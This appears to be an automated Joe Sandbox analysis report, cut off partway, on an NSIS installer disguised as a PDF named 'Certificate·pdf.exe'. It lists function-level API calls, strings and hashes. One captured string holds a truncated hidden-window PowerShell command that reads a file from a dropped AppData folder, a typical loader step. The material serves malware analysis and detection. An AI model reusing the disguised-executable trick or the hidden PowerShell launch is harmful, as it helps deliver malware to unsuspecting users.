Associated: 00000000.00000002.23341017704.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341761650.00000000007CB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Certificate#U00b7pdf.jbxd

Similarity

API ID: CountTick$wsprintf
String ID: ... %d%%
API String ID: 551687249-2449383134
Opcode ID: e5ebdf3a3088b3206fd1fd2d7a2307a5c5a9c69b21f930b1953cca8bb268646f
Instruction ID: 204c6f4639eb8c290f7f343d6ac391169eef919077521cdf394e4ce58078bb87
Opcode Fuzzy Hash: e5ebdf3a3088b3206fd1fd2d7a2307a5c5a9c69b21f930b1953cca8bb268646f
Instruction Fuzzy Hash: 7A518931900219EBCB10DF65DA84A9F7FA8AB44366F1441BBED14B62C0D7789F50CBA9

Function 00405DBC Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 37
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00405DDA
GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,"C:\Users\user\Desktop\Certificate#U00b7pdf.exe",0040336A,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,77143420,004035B6), ref: 00405DF5

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405DC1, 00405DC5
"C:\Users\user\Desktop\Certificate#U00b7pdf.exe", xrefs: 00405DBC
nsa, xrefs: 00405DC9

Memory Dump Source

Source File: 00000000.00000002.23340938665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.23340912487.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23340965335.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341761650.00000000007CB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Certificate#U00b7pdf.jbxd

Similarity

API ID: CountFileNameTempTick
String ID: "C:\Users\user\Desktop\Certificate#U00b7pdf.exe"$C:\Users\user\AppData\Local\Temp\$nsa
API String ID: 1716503409-3647523685
Opcode ID: 579317ece081e1c49d3b274132234632dc0f80c8b4471fc5797a0d742f25062f
Instruction ID: 33897e7ea40e9bcc5f45ceb9d35bf1368e2cdd1c67b8b6f6c5069f2428d8a25f
Opcode Fuzzy Hash: 579317ece081e1c49d3b274132234632dc0f80c8b4471fc5797a0d742f25062f
Instruction Fuzzy Hash: D4F03076610304FBEB009F69DD05F9FBBB8EB95710F10803AED40E7250E6B1AA54CBA4

Function 004015C1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00405C17: CharNextW.USER32(?,?,007A4728,?,00405C8B,007A4728,007A4728,?,?,77143420,004059C9,?,C:\Users\user\AppData\Local\Temp\,77143420,00000000), ref: 00405C25
Part of subcall function 00405C17: CharNextW.USER32(00000000), ref: 00405C2A
Part of subcall function 00405C17: CharNextW.USER32(00000000), ref: 00405C42

GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A

Part of subcall function 004057CE: CreateDirectoryW.KERNEL32(?,?,00000000), ref: 00405811

SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Local\Skamflelsens\fameless\Imitability\Ilddaabens,?,00000000,000000F0), ref: 0040164D

Strings

C:\Users\user\AppData\Local\Skamflelsens\fameless\Imitability\Ilddaabens, xrefs: 00401640

Memory Dump Source

Source File: 00000000.00000002.23340938665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.23340912487.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23340965335.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341761650.00000000007CB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Certificate#U00b7pdf.jbxd

Similarity

API ID: CharNext$Directory$AttributesCreateCurrentFile
String ID: C:\Users\user\AppData\Local\Skamflelsens\fameless\Imitability\Ilddaabens
API String ID: 1892508949-2063836133
Opcode ID: 73940142f68607cba11c891c41a5eadd7aa80569be3db2e043df1f50633e24e8
Instruction ID: 83f66e59323efd8676d207054edf3c08df55f1f8244358cc2c8da33562713246
Opcode Fuzzy Hash: 73940142f68607cba11c891c41a5eadd7aa80569be3db2e043df1f50633e24e8
Instruction Fuzzy Hash: 1811D031504500EBCF20BFA1CD0199E36A0EF15329B28493FFA45B22F1DB3E89919A5E

Function 00405C74 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00406297: lstrcpynW.KERNEL32(?,?,00000400,0040343D,007A7A20,NSIS Error,?,00000006,00000008,0000000A), ref: 004062A4

Part of subcall function 00405C17: CharNextW.USER32(?,?,007A4728,?,00405C8B,007A4728,007A4728,?,?,77143420,004059C9,?,C:\Users\user\AppData\Local\Temp\,77143420,00000000), ref: 00405C25
Part of subcall function 00405C17: CharNextW.USER32(00000000), ref: 00405C2A
Part of subcall function 00405C17: CharNextW.USER32(00000000), ref: 00405C42

lstrlenW.KERNEL32(007A4728,00000000,007A4728,007A4728,?,?,77143420,004059C9,?,C:\Users\user\AppData\Local\Temp\,77143420,00000000), ref: 00405CCD
GetFileAttributesW.KERNELBASE(007A4728,007A4728,007A4728,007A4728,007A4728,007A4728,00000000,007A4728,007A4728,?,?,77143420,004059C9,?,C:\Users\user\AppData\Local\Temp\,77143420), ref: 00405CDD

Strings

(Gz, xrefs: 00405C7A

Memory Dump Source

Source File: 00000000.00000002.23340938665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.23340912487.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23340965335.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341761650.00000000007CB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Certificate#U00b7pdf.jbxd

Similarity

API ID: CharNext$AttributesFilelstrcpynlstrlen
String ID: (Gz
API String ID: 3248276644-3338112938
Opcode ID: f876970076993f733f9246bd8c2efe22564afd40dcf2357ec22258bdd39e6079
Instruction ID: 850bfc7ffc9f89e8bebb6f59b63454ed566b5c4d810398842941662e03732b0e
Opcode Fuzzy Hash: f876970076993f733f9246bd8c2efe22564afd40dcf2357ec22258bdd39e6079
Instruction Fuzzy Hash: 82F0D625019F5216F622363A4D09AAF1954CE82364B0A013FF891722C1DB3C8942DD6E

Function 00406165 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,?,00000800,00000002,?,00000000,?,?,Execute: ,?,?,004063D9,80000002), ref: 004061AB
RegCloseKey.ADVAPI32(?,?,004063D9,80000002,Software\Microsoft\Windows\CurrentVersion,Execute: ,Execute: ,Execute: ,00000000,Execute: powershell.exe -windowstyle hidden $cas = Get-Content 'C:\Users\user\AppData\Local\Skamflelsens\fameless\Imitability\Il), ref: 004061B6

Strings

Execute: , xrefs: 0040616C

Memory Dump Source

Source File: 00000000.00000002.23340938665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.23340912487.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23340965335.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341761650.00000000007CB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Certificate#U00b7pdf.jbxd

Similarity

API ID: CloseQueryValue
String ID: Execute:
API String ID: 3356406503-3756222843
Opcode ID: c86c14991d827863ed80974af0b6eb11eee99485bcf286d774b2a77da772c934
Instruction ID: f8c60df0673843c4a96ed35a73ceba2ba355a7ad566f59c539dda5576aee505e
Opcode Fuzzy Hash: c86c14991d827863ed80974af0b6eb11eee99485bcf286d774b2a77da772c934
Instruction Fuzzy Hash: B301BC72500219EADF21CF50CC09EDB3BA8EB04360F01803AFD16A6191E778D964CBA4

Function 00405880 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,007A4F28,Error launching installer), ref: 004058A9
CloseHandle.KERNEL32(?), ref: 004058B6

Strings

Error launching installer, xrefs: 00405893

Memory Dump Source

Source File: 00000000.00000002.23340938665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.23340912487.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23340965335.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341761650.00000000007CB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Certificate#U00b7pdf.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID: Error launching installer
API String ID: 3712363035-66219284
Opcode ID: c1804180a416b962a28ecbb96a8e49de5f878aa0b2aa8e9b50c45ca8c4f376c1
Instruction ID: b039bfc1fd8153a77b97507ee8e8b42fe9752dbefc529c56e43fdfa491991b30
Opcode Fuzzy Hash: c1804180a416b962a28ecbb96a8e49de5f878aa0b2aa8e9b50c45ca8c4f376c1
Instruction Fuzzy Hash: 6CE0B6F5600209BFFB00AF64ED09E7B7BACEB58605F058525BD51F2290D6B998148A78

Function 004023E4 Relevance: 4.6, APIs: 3, Instructions: 64registrystringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(0040B5A8,00000023,?,00000000,00000002,00000011,00000002), ref: 0040242F
RegSetValueExW.KERNELBASE(?,?,?,?,0040B5A8,00000000,?,00000000,00000002,00000011,00000002), ref: 0040246F
RegCloseKey.KERNELBASE(?,?,?,0040B5A8,00000000,?,00000000,00000002,00000011,00000002), ref: 00402557

Memory Dump Source

Source File: 00000000.00000002.23340938665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.23340912487.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23340965335.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341761650.00000000007CB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Certificate#U00b7pdf.jbxd

Similarity

API ID: CloseValuelstrlen
String ID:
API String ID: 2655323295-0
Opcode ID: 9ae16c367c641726b2c7cc81df632fbb5fa1d95dd1bb84893f35c5cbb6edaf58
Instruction ID: 82080937d165882f0efaaa77ae0bb3c7350c3cd8b3028382441b60bd8f3f090b
Opcode Fuzzy Hash: 9ae16c367c641726b2c7cc81df632fbb5fa1d95dd1bb84893f35c5cbb6edaf58
Instruction Fuzzy Hash: 60118171D00104BEEF10AFA5DE89EAEBAB4EB44754F11803BF504B71D1DBB88D419B28

Function 00402259 Relevance: 4.6, APIs: 3, Instructions: 51stringCOMMON

Download Yara Rule

APIs

Part of subcall function 004065DA: FindFirstFileW.KERNELBASE(?,007A4F70,007A4728,00405CBD,007A4728,007A4728,00000000,007A4728,007A4728,?,?,77143420,004059C9,?,C:\Users\user\AppData\Local\Temp\,77143420), ref: 004065E5
Part of subcall function 004065DA: FindClose.KERNEL32(00000000), ref: 004065F1

lstrlenW.KERNEL32 ref: 00402299
lstrlenW.KERNEL32(00000000), ref: 004022A4
SHFileOperationW.SHELL32(?,?,?,00000000), ref: 004022CD

Memory Dump Source

Source File: 00000000.00000002.23340938665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.23340912487.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23340965335.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341761650.00000000007CB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Certificate#U00b7pdf.jbxd

Similarity

API ID: FileFindlstrlen$CloseFirstOperation
String ID:
API String ID: 1486964399-0
Opcode ID: 61f3fd282a52c31f5ccd964d07d22c05697a733044f4624dbe4c236db9297d7a
Instruction ID: bbe877ab11025427faf5f2d41b675fbfdb26c0ea37d129f2242468f609b66021
Opcode Fuzzy Hash: 61f3fd282a52c31f5ccd964d07d22c05697a733044f4624dbe4c236db9297d7a
Instruction Fuzzy Hash: 74117071D10314AADF10EFF98A4999EB7B8AF04344F14847FA805F72D1D6B8C4418B59

Function 004024F8 Relevance: 4.5, APIs: 3, Instructions: 47registryCOMMON

Download Yara Rule

APIs

RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 0040252B
RegEnumValueW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,00020019), ref: 0040253E
RegCloseKey.KERNELBASE(?,?,?,0040B5A8,00000000,?,00000000,00000002,00000011,00000002), ref: 00402557

Memory Dump Source

Source File: 00000000.00000002.23340938665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.23340912487.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23340965335.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341761650.00000000007CB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Certificate#U00b7pdf.jbxd

Similarity

API ID: Enum$CloseValue
String ID:
API String ID: 397863658-0
Opcode ID: 483f4d4475094cacbe2a8cc6776651ad36624d4f10963f9b9b76c2ffb75e4dd9
Instruction ID: aff41db5cb1f43c080787ec2daae132adce55f0eb50407644cc943dfdce05a74
Opcode Fuzzy Hash: 483f4d4475094cacbe2a8cc6776651ad36624d4f10963f9b9b76c2ffb75e4dd9
Instruction Fuzzy Hash: 59018471904204BFEB149F95DE88ABF7ABCEF80348F14803EF505B61D0DAB85E419B69

Function 00402484 Relevance: 3.1, APIs: 2, Instructions: 56registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.ADVAPI32(00000000,00000000,?,?,?,?), ref: 004024B5
RegCloseKey.KERNELBASE(?,?,?,0040B5A8,00000000,?,00000000,00000002,00000011,00000002), ref: 00402557

Memory Dump Source

Source File: 00000000.00000002.23340938665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.23340912487.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23340965335.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341761650.00000000007CB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Certificate#U00b7pdf.jbxd

Similarity

API ID: CloseQueryValue
String ID:
API String ID: 3356406503-0
Opcode ID: e36128bb1b6e741cd68d9522df147e685498ba3c9d325e858177db0b4d3207af
Instruction ID: 1ba22ac92ecf447665b3913d31df39b0814a7bcf15a964c104b9173a467dca89
Opcode Fuzzy Hash: e36128bb1b6e741cd68d9522df147e685498ba3c9d325e858177db0b4d3207af
Instruction Fuzzy Hash: 2A119431910205EBDB14DFA4CA585AE77B4FF44348F20843FE445B72C0D6B85A41EB5A

Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON

Download Yara Rule

APIs

MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4

Memory Dump Source

Source File: 00000000.00000002.23340938665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.23340912487.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23340965335.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341761650.00000000007CB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Certificate#U00b7pdf.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 1be36e7ffb4e60f8615e9040eadbbc0b6b8dcead5e0d66e97d35916fbcf3aab6
Instruction ID: 2a828f8333626ea4f8ae47897e76cf54d119540c9549312051f7543085d76b41
Opcode Fuzzy Hash: 1be36e7ffb4e60f8615e9040eadbbc0b6b8dcead5e0d66e97d35916fbcf3aab6
Instruction Fuzzy Hash: 9101D132624210ABE7095B789D04B6A3698E751315F10C63BB851F66F1DA7C8C429B4D

Function 004053D2 Relevance: 3.0, APIs: 2, Instructions: 32comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(00000000), ref: 004053E2

Part of subcall function 0040425A: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040426C

OleUninitialize.OLE32(00000404,00000000), ref: 0040542E

Memory Dump Source

Source File: 00000000.00000002.23340938665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.23340912487.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23340965335.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
